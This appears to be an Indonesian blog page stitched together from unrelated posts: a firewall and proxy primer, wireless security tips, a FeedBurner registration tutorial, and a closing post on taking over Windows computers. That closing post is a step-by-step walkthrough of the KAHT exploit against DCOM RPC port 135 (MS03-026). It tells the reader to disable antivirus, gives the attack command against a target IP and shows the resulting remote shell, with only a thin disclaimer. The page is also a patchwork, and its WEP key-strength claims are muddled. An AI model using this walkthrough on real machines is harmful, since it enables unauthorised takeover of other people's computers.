Firewall merupakan alat untuk mengimplementasikan kebijakan security (security policy). Sedangkan kebijakan security, dibuat berdasarkan perimbangan antara fasilitas yang disediakan dengan implikasi security-nya. Semakin ketat kebijakan security, semakin kompleks konfigurasi layanan informasi atau semakin sedikit fasilitas yang tersedia di jaringan. Sebaliknya, dengan semakin banyak fasilitas yang tersedia atau sedemikian sederhananya konfigurasi yang diterapkan, maka semakin mudah orang orang ‘usil’ dari luar masuk kedalam sistem (akibat langsung dari lemahnya kebijakan security).

Tulisan ini akan mencoba melihat beberapa kebijakan sekuriti yang lazim digunakan pada saat mengkaitkan sebuah jaringan ke Internet.

Firewall

Firewall adalah istilah yang biasa digunakan untuk menunjuk pada suatu komponen atau sekumpulan komponen jaringan, yang berfungsi membatasi akses antara dua jaringan, lebih khusus lagi, antara jaringan internal dengan jaringan global Internet. Firewall mempunyai beberapa tugas :

* Pertama dan yang terpenting adalah: harus dapat mengimplementasikan kebijakan security di jaringan (site security policy). Jika aksi tertentu tidak diperbolehkan oleh kebijakan ini, maka firewall harus meyakinkan bahwa semua usaha yang mewakili operasi tersebut harus gagal atau digagalkan. Dengan demikian, semua akses ilegal antar jaringan (tidak diotorisasikan) akan ditolak.
* Melakukan filtering: mewajibkan semua traffik yang ada untuk dilewatkan melalui firewall bagi semua proses pemberian dan pemanfaatan layanan informasi. Dalam konteks ini, aliran paket data dari/menuju firewall, diseleksi berdasarkan IP-address, nomor port, atau arahnya, dan disesuaikan dengan kebijakan security.
* Firewall juga harus dapat merekam/mencatat even-even mencurigakan serta memberitahu administrator terhadap segala usaha-usaha menembus kebijakan security.

Merencanakan Jaringan Dengan Firewall

Merencanakan sistem firewall pada jaringan, berkaitan erat dengan jenis fasilitas apa yang akan disediakan bagi para pemakai, sejauh mana level resiko-security yang bisa diterima, serta berapa banyak waktu, biaya dan keahlian yang tersedia (faktor teknis dan ekonomis). Firewall umumnya terdiri dari bagian filter (disebut juga screen atau choke) dan bagian gateway (gate). Filter berfungsi untuk membatasi akses, mempersempit kanal, atau untuk memblok kelas trafik tertentu. Terjadinya pembatasan akses, berarti akan mengurangi fungsi jaringan. Untuk tetap menjaga fungsi komunikasi jaringan dalam lingkungan yang ber-firewall, umumnya ditempuh dua cara :

* Pertama, bila kita bayangkan jaringan kita berada dalam perlindungan sebuah benteng, komunikasi dapat terjadi melalui pintu-pintu keluar benteng tersebut. Cara ini dikenal sebagai packet-filtering, dimana filter hanya digunakan untuk menolak trafik pada kanal yang tidak digunakan atau kanal dengan resiko-security cukup besar, sedangkan trafik pada kanal yang lain masih tetap diperbolehkan.
* Cara kedua, menggunakan sistem proxy, dimana setiap komunikasi yang terjadi antar kedua jaringan harus dilakukan melalui suatu operator, dalam hal ini proxy server. Beberapa protokol, seperti telnet dan SMTP(Simple Mail Transport Protocol), akan lebih efektif ditangani dengan evaluasi paket (packet filtering), sedangkan yang lain seperti FTP (File Transport Protocol), Archie, Gopher dan HTTP (Hyper-Text Transport Protocol) akan lebih efektif ditangani dengan sistem proxy. Kebanyakan firewall menggunakan kombinasi kedua teknik ini (packet filtering dan proxy).

Ada banyak literatur yang membahas masalah security & membagi arsitektur dasar firewall menjadi tiga jenis. Masing masing adalah:

* arsitektur dengan dual-homed host (kadang kadang dikenal juga sebagai dual homed gateway/ DHG)
* screened-host (screened host gateway/ SHG) · screened subnet (screened subnet gateway/ SSG).

Sistem DHG menggunakan sebuah komputer dengan (paling sedikit) dua network-interface. Interface pertama dihubungkan dengan jaringan internal dan yang lainnya dengan Internet. Dual-homed host nya sendiri berfungsi sebagai bastion host (front terdepan, bagian terpenting dalam firewall).

Pada topologi SHG, fungsi firewall dilakukan oleh sebuah screening-router dan bastion host. Router ini dikonfigurasi sedemikian sehingga akan menolak semua trafik kecuali yang ditujukan ke bastion host, sedangkan pada trafik internal tidak dilakukan pembatasan. Dengan cara ini setiap client servis pada jaringan internal dapat menggunakan fasilitas komunikasi standard dengan Internet tanpa harus melalui proxy.

Firewall dengan arsitektur screened-subnet menggunakan dua screening-router dan jaringan tengah (perimeter network) antara kedua router tersebut, dimana ditempatkan bastion host. Kelebihan susunan ini akan terlihat pada waktu optimasi penempatan server.

Selanjutnya, bagaimana relevansi arsitektur firewall tersebut terhadap level security? Suatu jaringan harus dapat menangani interaksi client-server, tidak terkecuali dengan kehadiran firewall. Sejauh ini, untuk operasi client internal - server internal, atau client internal - server eksternal, tidak terlalu menimbulkan masalah. Jika kita akan membuat sistem firewall untuk jaringan demikian, hanya dengan memasang proxy server pada bastion host dalam arsitektur yang dipilih, kualitas proteksi firewall yang bersangkutan akan maksimal. Artinya ‘keselamatan’ seluruh jaringan, sekarang hanya tergantung pada baik-tidaknya atau seberapa ‘bagus’ firewall tersebut dan tidak tergantung pada program-program yang lain. Beda halnya bila jaringan kita akan mendukung operasi client eksternal - server internal, atau dengan kata lain : jaringan internal kita menyediakan layanan informasi yang dapat diakses dari luar. Dalam konteks ini, harus diperhitungkan metoda penempatan mesin yang menjalankan program server, supaya mesin tersebut dapat dikenali dari internet dan sedemikian, komunikasi dengan client-nya dapat berlangsung dengan baik tanpa mengorbankan kepentingan security.

Arsitektur dual-homed menawarkan solusi sederhana dan murah. Satu-satunya mesin yang dikenal dari internet dalam sistem ini adalah dual-homed host-nya sendiri, dan dengan demikian ia menjadi satu-satunya mesin alternatif untuk menjalankan program server. Tetapi akan bermanfaat untuk mengingat, bahwa semakin banyak layanan yang disediakan atau semakin banyak program yang berjalan pada bastion-host, maka peluang penyusupan ke komputer tersebut semakin besar. Karena, seperti diyakini banyak orang, hampir dipastikan tidak ada program apapun yang bebas sama sekali dari bugs, apalagi untuk program-program berukuran besar. Dan sekali bugs ini dapat dieksploitasi oleh seseorang yang kemudian masuk ke dalam bastion-host, maka seluruh komputer di jaringan kita akan menjadi terbuka! Jika faktor ekonomis memaksa kita untuk tetap mengimplementasikan arsitektur DHG, maka ada beberapa nasihat yang patut diperhatikan, diantaranya: menggunakan perangkat lunak server yang telah teruji relatif ‘aman’ serta berukuran kecil, mereduksi dan mengoptimasi jumlah program yang berjalan, kemudian tidak memberikan account reguler pada bastion-host.

Dua arsitektur lainnya, screened-host dan screened-subnet, menyediakan pilihan lebih banyak. Screening-router dapat diatur untuk melakukan operasi packet filtering yang memungkinkan mesin-mesin tertentu dapat dikenali dari luar. Mesin mesin ini, kemudian menjalankan program-program server yang dapat diakses dari internet. Resiko dengan metoda seperti ini adalah penambahan jumlah komputer yang mungkin untuk diserang, sehingga akan lebih baik jika sebelumnya kita menyiapkan mesin-mesin tersebut dengan level security paling tidak sama dengan bastion-host atau kalau bisa, lebih.

Packet Filtering

Berbagai kebijakan dapat diterapkan dalam melakukan operasi packet filtering. Pada intinya, berupa mekanisme pengontrollan data yang diperbolehkan mengalir dari dan/atau ke jaringan internal, dengan menggunakan beberapa parameter yang tercantum dalam header paket data: arah (inbound atau outbound), address asal dan tujuan, port asal dan tujuan, serta jenis protokol transport. Router akan mengevaluasi informasi ini dalam setiap paket data yang mengalir melaluinya, kemudian menetapkan aksi yang harus dilakukan terhadap paket tersebut, berdasarkan set aturan/program dalam packet-filtering. Sehingga keputusan routing dasar router tersebut, kemudian dilengkapi dengan bagian dari kebijakan security jaringan.

Tabel berikut akan menunjukan contoh konfigurasi operasi packet-filtering, untuk menyediakan hanya fasilitas SMTP inbound dan outbound pada jaringan.

Aturan


Arah


Address Asal


Address Tujuan


Protokol


Port Tujuan


Aksi
A masuk eksternal internal TCP 25 ok
B keluar internal eksternal TCP >1023 ok
C keluar internal eksternal TCP 25 ok
D masuk eksternal internal TCP >1023 ok
E sembarang sembarang sembarang sembarang sembarang deny

Aturan A dan B melayani hubungan SMTP inbound (email datang), aturan C dan D melayani hubungan SMTP outbound (email keluar) serta aturan E merupakan aturan default yang dilakukan bila aturan aturan sebelumnya gagal. Kalau diamati lebih dekat, selain trafik SMTP konfigurasi tersebut juga masih membolehkan hubungan masuk dan keluar pada port >1023 (aturan B dan D), sehingga terdapat kemungkinan bagi program-program server seperti X11 (port 6000), OpenWindows (port 2000), atau kebanyakan program basis-data (Sybase, Oracle, Informix, dll), untuk dihubungi dari luar. Untuk menutup kemungkinan ini, diperlukan evaluasi parameter lain, seperti evaluasi port asal. Dengan cara ini, satu-satunya celah menembus firewall adalah dengan menggunakan port SMTP. Bila kita masih juga kurang yakin dengan kejujuran para pengguna port ini, dapat dilakukan evaluasi lebih lanjut dari informasi ACK.

Proxy

Dalam jaringan yang menerapkan sistem proxy, hubungan komunikasi ke internet dilakukan melalui sistem pendelegasian. Komputer-komputer yang dapat dikenali oleh internet bertindak sebagai ‘wakil’ bagi mesin lain yang ingin berhubungan ke luar. Proxy server untuk (kumpulan) protokol tertentu dijalankan pada dual-homed host atau bastion-host, dimana seluruh pemakai jaringan dapat berkomunikasi dengannya, kemudian proxy server ini bertindak sebagai delegasi. Dengan kata lain setiap program client akan berhubungan dengan proxy server dan proxy server ini lah yang akan berhubungan dengan server sebenarnya di internet. Proxy server akan mengevaluasi setiap permintaan hubungan dari client dan memutuskan mana yang diperbolehkan dan mana yang tidak. Bila permintaan hubungan ini disetujui, maka proxy server me-relay permintaan tersebut pada server sebenarnya.

Ada beberapa istilah menunjuk pada tipe proxy server, diantaranya proxy level aplikasi, proxy level circuit, proxy generik atau khusus, proxy cerdas dll. Apapun jenis proxy yang digunakan, ada beberapa konsekuensi implementasi sistem ini:

* pada umumnya memerlukan modifikasi client dan/atau prosedur akses serta menuntut penyediaan program server berbeda untuk setiap aplikasi.
* Penggunaan sistem proxy memungkinkan penggunaan private IP Address bagi jaringan internal. Konsekuensinya kita bisa memilih untuk menggunakan IP Address kelas A (10.x.x.x) untuk private IP address yang digunakan dalam jaringan internet; sehingga komputer yang dapat tersambung dalam jaringan internal dapat mencapai jumlah jutaan komputer.
* Paket SOCKS atau TIS FWTK merupakan contoh paket perangkat lunak proxy yang sering digunakan dan tersedia bebas di internet.

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

1. Ubahlah Sistem ID (Identitas)
Biasanya suatu layanan nirkabel dilengkapi dengan suatu standart pengamanan identitas atau yang sering disebut SSID (Service Set Identifier) or ESSID (Extended Service Set Identifier). Sangat mudah bagi seorang hacker untuk mencari tahu identitas default dari suatu layanan atau jaringan, jadi sebaiknya Anda segera mengubahnya menjadi suatu identitas yang unik, yang tidak mudah ditebak orang lain.

2. Mematikan identitas pemancar
Dengan mengumumkan kepada umum bahwa Anda memiliki suatu jaringan nirkabel akan membuat para hacker penasaran untuk membobol jaringan nirkabel Anda. Mempunyai suatu jaringan nirkabel bukan berarti harus memberitahukannya kepada semua orang. Periksalah secara manual perangkat keras yang Anda pakai untuk jaringan nirkabel tersebut, dan pelajarilah bagaimana cara mematikannya.

3. Sediakanlah enkripsi
WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access) dapat meng-enkripsi data Anda sehingga hanya penerima saja yang diharapkan dapat membaca data tersebut. WEP (Wired Equivalent Privacy) mempunyai banyak kelemahan yang membuatnya mudah disusupi. Kunci 128-bit hanya mempunyai tingkat pencapaian yang relatif rendah tanpa peningkatan keamanan yang signifikan, sedangkan untuk 40-bit atau 64-bit pada beberapa perlengkapan lainnya, mempunyai enkripsi yang sama baiknya. Dengan cara pengamanan yang standart saja pastilah tetap akan mudah bagi hacker untuk menyusup, namun dengan cara enkripsi ini pastilah akan membuat jaringan Anda lebih aman dari hacker. Jika memungkinkan, ada baiknya untuk menggunakan enkripsi WPA (peralatan yang lebih tua dapat diupgrade terlebih dahulu agar compatible dengan WPA). WPA dapat sangat menjanjikan dalam menjamin keamanan jaringan nirkabel Anda, namun masih tetap dapat dikalahkan oleh serangan DOS (denial of services).

4. Membatasi dari penggunaan traffic yang tidak perlu
Banyak router jaringan kabel maupun nirkabel yang dilengkapi firewalls. Bukan bermaksud mengedepankan firewalls, namun firewalls telah membantu dalam pertahanan keamanan jaringan. Bacalah petunjuk manual dari perangkat keras Anda dan pelajarilah cara pengaturan konfigurasi router Anda, sehingga hanya traffic yang sudah seijin Anda saja yang dapat dijalankan.

5. Ubahlah 'kata sandi' default Administrator milik Anda
Hal ini baik untuk semua penggunaan perangkat keras maupun perangkat lunak. Kata sandi default sangat mudah disalahgunakan, terutama oleh para hacker. Oleh karena itu sebaiknya ubahlah kata sandi Anda, hindari penggunaan kata dari hal-hal pribadi Anda yang mudah diketahui orang, seperti nama belakang, tanggal lahir, dan sebagainya.

6. Kunci dan lindungilah komputer Anda
Hal ini merupakan cara pengamanan terakhir untuk komputer Anda. Gunakanlah firewall, perangkat lunak Anti Virus, Zone Alarm, dan lain sebagainya. Setidaknya setiap satu minggu perbaharuilah Anti Virus yang Anda pakai.
(dna)

Sumber:http://www.beritanet.com/Technology/Security/keamanan-wireless-network.html

Bagi Rekan-rekan yang ingin blognya lebih cepat terkenal saya sarankan untuk bergabung dengan feedburner, layanannya ditanggung gratis dan hanya salah satu pilihan untuk memperkenalkan blog atau situs kita di internet. Bagi yang ingin mendaftar tapi belum mengetahui caranya, silahkan ikuti langkah-langkah berikut ini :
Silahkan kunjungi http://www.feedburner.com atau klik saja di sini !
Klik tulisan Register pada halaman bagian atas
Isi seluruh form yang yang ada
Username –> isi dengan username yang diinginkan. contoh : japra
password –> isi dengan password yang diinginkan. contoh : japratea
Password (again) –> isikan kembali password yang tadi di tulis
Email address –> isi dengan alamat email yang sobat miliki
Secret Question –> isi dengan pertanyaan rahasia yang jawabannya nanti cuma sobat yang tau. Contoh : siapa nama pacar pertamamu ?
Secret Answer –> isi dengan jawaban yang sesuai dengan pertanyaan di atas. Contoh : juleha
Klik tombol Sigin

Jika berhasil, muncul ucapan selamat datang (welcome)dari feedburner
Isi kotak di bawah tulisan Burn a feed right this instant dengan alamat blog sobat. Contoh : http://template-unik.blogspot.com
Beri tanda pada radio buuton yang tersedia, terserah mau pilih yang mana, kemudian klik tombol Next
Ubah Feed Title dengan Feed Address jika mau di ubah, kalo sudah tinggal klik tombol Active Feed
Ada ucapan Conrats, klik saja langsung tombol Next
Beri tanda centang pada kotak di samping tulisan Clickthroughs serta I want more ! have FeedBurner stats PRO also track (karena sekarang layanan yang PRO pun sudah gratis karena sudah di beli oleh google)
Klik tombol Next
Klik tab Optimize
Silahkan setting yang sobat inginkan, tapi yang paling penting adalah sobat harus mengaftifkan fitur SmartFeed, karena fitur ini berfungsi agar supaya fungsi dari feed kita kompatibel atau klop dengan berbagai feed reader yang ada
silahkan klik SmartFeed lalu klik tombol Active
Klik tab Publicize, silahkan pilih fitur yang sobat inginkan, tapi yang sering di gunakan adalah fitur feedCount coba klik FeedCount
Pilih bentuk style dari feedcount, yang biasa atau yang animasi, beri tanda pada radio button di sampingnya
Klik tombol Active
Copy kode HTML yang di berikan pada text area, paste pada notepad untuk nanti di pasang di blog sobat
Klik Chicklet Chooser untuk memilih berbagai banner atau chicklet seperti yang di tanyakan sobat setyo
Beri tanda pada radio button yang terletak di samping chicklet masing-masing, kemudian copy kode HTML yang di berikan yang ada pada text area, kemudian paste pada notepad. catatan : setiap sobat memberi tanda pada radio button masing-masing chicklet, maka secara otomatis kode HTML yang ada di bagian bawahpun akan berubah, jadi kesimpulannya beri tanda radio button lalu copy kode HTML nya beri tanda lagi lalu copy kodenya lagi
Klik Pingshot, beri tanda pada kotak di samping Ping-O-matic serta Newsgator, klik menu dropdown yang ada, lalu pilih yang sobat inginkan, klik tombol Add, klik lagi menu dropdownnya bila ingin di tambahkan lagi, klik Add kembali
Klik tombol Active
Klik Headline Animator untuk mendapatkan banner animasi
Klik menu dropdown di bawah tulisan Theme, pilih yang sesuai keinginan (yang paling banyak di minati adalah type classic)
Klik tombol Active
Klik menu dropdown di samping tulisan Add to, pilih Blogger blog
Klik tombol Next
Setelah muncul window baru, klik tombol Add to Blogger
silahkan Sign in dulu di blogger
Pilih blog yang mau di pasang banner animasi nya, lalu klik tombol Menambah Widget maka secara otomatis banner animasi akan di tambahkan. catatan : cara ini hanya berlaku bagi yang memakai template baru
Silahkan sign out dari situs tersebut
Selesai

Untuk fitur-fitur yang lain lainnya, silahkan rekan coba-coba saja sendiri karena jika di terangkan semuanya, saya anggap terlalu banyak.

Untuk pemasangan kode-kode HTMl yang tadi di copy pada notepad, saya anggap rekan sudah bisa melakukannya, karena sudah sering saya bahas. Yang pake template klasik tinggal paste saja pada kode template nya, bagi yang pake template baru ya tinggal tambah elemen trus pilih yang HTML/Javascript, paste kodenya udah deh.

Satu yang paling terakhir. Seperti yang saya katakan diatas tadi bahwa sekarang feedburner sudah di beli sama google, maka untuk feed blogger bisa di alihkan ke feedburner. Caranya seperti ini :
Sig in di blogger
Klik menu Pengaturan
Klik Feed Situs
Di sebelah tulisan Ijinkan Feed Blog, pilih yang Penuh
Simpan alamat feed dari feedburner pada kotak di samping tulisan posting URL Pengubahan Arah Feed. contoh alamat feed dari feed burner : http://feeds.feedburner.com/TemplateUnik
bila sobat mempunyai account google adsense, sobat bisa menyimpan kode iklan google adsense sobat pada kotak di samping tulisan Feed Item Footer
Klik tombol Simpan Pengaturan
Selesai.

Ok deh, semoga dengan bergabungnya sobat ke feedburner, blog sobat menjadi cepat terkenal dan ramai di kunjungi

Artikel ini bukan bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara membobol password komputer orang lain, tapi hanya sekedar mengingatkan kepada anda terutama bagi administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.
kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135, yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.

Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools Kaht bisa anda download disini .
Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
Langkahnya :
1. Unzip file Kaht.zip
2. Letakkan pada direktori yang anda suka.
3. Masuk ke direktori tempat file berada melalui text mode
4. Tentukan sasaran pc yang akan di hacking missal
IP : 192.168.30.3
Kaht 192.168.30.1 192.168.30.3
Jika hacking anda berhasil akan tampil pada command line kira-kira sbb:


KAHT II - MASSIVE RPC EXPLOIT dst

[+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
[+] Attacking Port:135. Remote Shell at port:36388
[+] Scan In Progress......
- Connecting to 192.168.30.3
Sending Exploit to a [Win2k] Server
- Connectando con la Shell Remote
dst........
C:WINNTsystem32>

Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai. anda bisa membuat user admin membuat sharing dll
Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan.